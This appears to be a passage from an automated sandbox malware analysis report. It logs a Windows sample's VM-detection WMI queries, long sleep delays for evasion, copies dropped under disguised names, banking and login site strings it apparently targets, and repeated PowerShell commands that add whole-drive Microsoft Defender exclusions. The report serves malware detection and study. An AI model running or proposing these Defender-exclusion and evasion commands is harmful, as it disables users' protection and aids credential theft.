                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                            Malware Analysis System Evasion

                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Memory allocated: CA0000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Memory allocated: 1A8D0000 memory reserve | memory write watch
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Memory allocated: 15A0000 memory reserve | memory write watch
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Memory allocated: 1AFC0000 memory reserve | memory write watch
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Memory allocated: 31A0000 memory reserve | memory write watch
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Memory allocated: 1B380000 memory reserve | memory write watch
                            Source: C:\Users\user\Downloads\smartscreen.exe Memory allocated: AB0000 memory reserve | memory write watch
                            Source: C:\Users\user\Downloads\smartscreen.exe Memory allocated: 1A530000 memory reserve | memory write watch
                            Source: C:\Users\user\Downloads\smartscreen.exe Memory allocated: 13E0000 memory reserve | memory write watch
                            Source: C:\Users\user\Downloads\smartscreen.exe Memory allocated: 1AED0000 memory reserve | memory write watch
                            Source: C:\Recovery\WmiPrvSE.exe Memory allocated: 1820000 memory reserve | memory write watch
                            Source: C:\Recovery\WmiPrvSE.exe Memory allocated: 1B310000 memory reserve | memory write watch
                            Source: C:\Recovery\WmiPrvSE.exe Memory allocated: E30000 memory reserve | memory write watch
                            Source: C:\Recovery\WmiPrvSE.exe Memory allocated: 1A920000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Memory allocated: 1520000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Memory allocated: 1AE70000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 600000
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 599719
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 599516
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 599297
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 599078
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 598469
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 598125
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 597942
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 595688
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 595529
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 595328
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 595125
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Downloads\smartscreen.exe Thread delayed: delay time: 922337203685477
                            Source: C:\Recovery\WmiPrvSE.exe Thread delayed: delay time: 922337203685477
                            Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 922337203685477
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeDropped PE file which has not been started: C:\Users\user\Desktop\qDaBeGpk.logJump to dropped file
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9968Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9724Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9360Thread sleep count: 1949 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9964Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9600Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9408Thread sleep count: 2441 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 10108Thread sleep time: -4611686018427385s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 10108Thread sleep time: -30000s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9824Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9444Thread sleep count: 1950 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9884Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9556Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9424Thread sleep count: 2042 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 10104Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9800Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9448Thread sleep count: 2068 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 10120Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9792Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9488Thread sleep count: 2012 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 10100Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9816Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9492Thread sleep count: 2423 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 10116Thread sleep time: -5534023222112862s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 10116Thread sleep time: -30000s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9808Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\svchost.exe TID: 10032Thread sleep time: -30000s >= -30000s
                            Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
                            Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\Downloads\smartscreen.exe File Volume queried: C:\ FullSizeInformation
                            Source: C:\Recovery\WmiPrvSE.exe File Volume queried: C:\ FullSizeInformation
                            Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 561157
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 561047
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 560934
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 560817
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 560703
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 560585
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 559885
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 559757
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Downloads\smartscreen.exeThread delayed: delay time: 922337203685477
                            Source: C:\Recovery\WmiPrvSE.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeFile opened: C:\Users\user\Documents\desktop.ini
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeFile opened: C:\Users\user
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeFile opened: C:\Users\user\AppData\Local\Temp
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeFile opened: C:\Users\user\AppData
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeFile opened: C:\Users\user\AppData\Local
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeFile opened: C:\Users\user\Desktop\desktop.ini
                            Source: YtBWM7vFD0.36.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                            Source: YtBWM7vFD0.36.drBinary or memory string: discord.comVMware20,11696428655f
                            Source: YtBWM7vFD0.36.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                            Source: YtBWM7vFD0.36.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                            Source: YtBWM7vFD0.36.drBinary or memory string: global block list test formVMware20,11696428655
                            Source: YtBWM7vFD0.36.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2256096642.000000001B25B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                            Source: YtBWM7vFD0.36.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                            Source: YtBWM7vFD0.36.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                            Source: YtBWM7vFD0.36.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                            Source: YtBWM7vFD0.36.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                            Source: YtBWM7vFD0.36.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                            Source: YtBWM7vFD0.36.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                            Source: YtBWM7vFD0.36.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                            Source: YtBWM7vFD0.36.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                            Source: YtBWM7vFD0.36.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                            Source: YtBWM7vFD0.36.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                            Source: YtBWM7vFD0.36.drBinary or memory string: outlook.office.comVMware20,11696428655s
                            Source: YtBWM7vFD0.36.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                            Source: YtBWM7vFD0.36.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2260842550.000000001D87A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_
                            Source: YtBWM7vFD0.36.drBinary or memory string: AMC password management pageVMware20,11696428655
                            Source: YtBWM7vFD0.36.drBinary or memory string: tasks.office.comVMware20,11696428655o
                            Source: w32tm.exe, 00000034.00000002.2297376786.000001E2D0F19000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll|
                            Source: YtBWM7vFD0.36.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                            Source: YtBWM7vFD0.36.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                            Source: YtBWM7vFD0.36.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                            Source: YtBWM7vFD0.36.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                            Source: YtBWM7vFD0.36.drBinary or memory string: dev.azure.comVMware20,11696428655j
                            Source: YtBWM7vFD0.36.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                            Source: YtBWM7vFD0.36.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                            Source: YtBWM7vFD0.36.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                            Source: YtBWM7vFD0.36.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                            Source: YtBWM7vFD0.36.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information queried: ProcessInformation
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess token adjusted: Debug
                            Source: C:\Users\user\Downloads\smartscreen.exeProcess token adjusted: Debug
                            Source: C:\Recovery\WmiPrvSE.exeProcess token adjusted: Debug
                            Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess token adjusted: Debug
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeMemory allocated: page read and write | page guard

                            HIPS / PFW / Operating System Protection Evasion

                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zuwFoSPM2u.bat" Jump to behavior
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
